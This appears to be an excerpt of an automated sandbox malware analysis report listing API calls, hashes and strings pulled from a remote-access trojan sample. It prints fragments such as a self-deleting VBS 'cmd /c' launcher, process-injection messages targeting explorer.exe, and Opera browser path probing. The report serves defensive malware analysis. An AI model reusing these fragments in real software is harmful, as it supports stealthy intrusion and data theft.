                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D72
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D80
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D8B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DC3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DCA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DE7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DFF
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 1001A0C9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBB4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBC6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBD8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBEA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBFC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC0E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC20
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC32
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC44
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC56
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC7A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC8C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0E0
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0F5
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A100
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A122
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A135
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A143
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A14E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A186
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A18D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A1AA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A1C2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                                                                                                                              • API String ID: 489098229-65789007
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                                                                                                                                                              • API String ID: 1913171305-390638927
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                                                                                                              • String ID: <$@$@FG$@FG$TUF$Temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 1107811701-4124992407
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ba09caefafd743c57d2e89f58fe8ed5c74fa0c6c6b7b445be49fdf63fe192e58
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba09caefafd743c57d2e89f58fe8ed5c74fa0c6c6b7b445be49fdf63fe192e58
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe), ref: 00406705
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2050909247-1144799832
                                                                                                                                                                                                                                                                                                                              • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043947A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439481
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2441525078-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,-00000002), ref: 100065F7
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,00000006), ref: 10006793
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-3709686828
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5d2622badbe7d1c6684bfc7606bad391be43c6f73f7f9521380fe3c15421bfe6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd525ab1337c3ee21bd27d398b55dee76c9cea0ea90567e5fc089a1fee8f1736
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d2622badbe7d1c6684bfc7606bad391be43c6f73f7f9521380fe3c15421bfe6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D917E74D20218AAEF00DFA4DC45BEEBBBAFF48744F204119F406E7295EB75A905CB51
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                                                                                                              • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 85ce1e49ef39a33b141425ad91aa3b78c7bcb8003ae9ff8e4031fe383a6a9ded
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85ce1e49ef39a33b141425ad91aa3b78c7bcb8003ae9ff8e4031fe383a6a9ded
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8f568d79055422364b0fc155fd47d6165a7356d41c75c5dcd4a60a29222dfb7a
